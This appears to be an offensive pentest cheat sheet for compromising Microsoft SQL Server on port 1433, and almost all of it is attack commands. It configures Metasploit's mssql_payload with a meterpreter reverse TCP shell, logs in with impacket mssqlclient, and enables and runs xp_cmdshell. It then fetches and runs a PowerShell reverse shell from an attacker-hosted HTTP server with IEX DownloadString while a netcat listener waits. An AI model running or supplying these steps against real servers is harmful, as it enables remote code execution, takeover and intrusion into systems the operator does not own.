1433/TCP (MSSQL Server)

use exploit/windows/mssql/mssql_payload
set username <username>
set password <password>
set rhosts <IP-address>
set payload windows/x64/meterpreter_reverse_tcp
set lhost <attacker-IP-address>
set lport <listen-port>
run

# Windows authentication
mssqlclient.py <target-name>/<username>:<password>@<IP-address> -windows-auth
# Microsft SQL Server authentication
mssqlclient.py <target-name>/<username>:<password>@<IP-address>

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
EXEC sp_configure 'xp_cmdshell', 1;
reconfigure;
sp_configure;
EXEC master..xp_cmdshell 'whoami';

python3 -m http.server 80
cp reverse-shell.ps1 .
nc -lvnp <listen-port>

EXEC master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://<attacker-IP-address>/reverse-shell.ps1\");'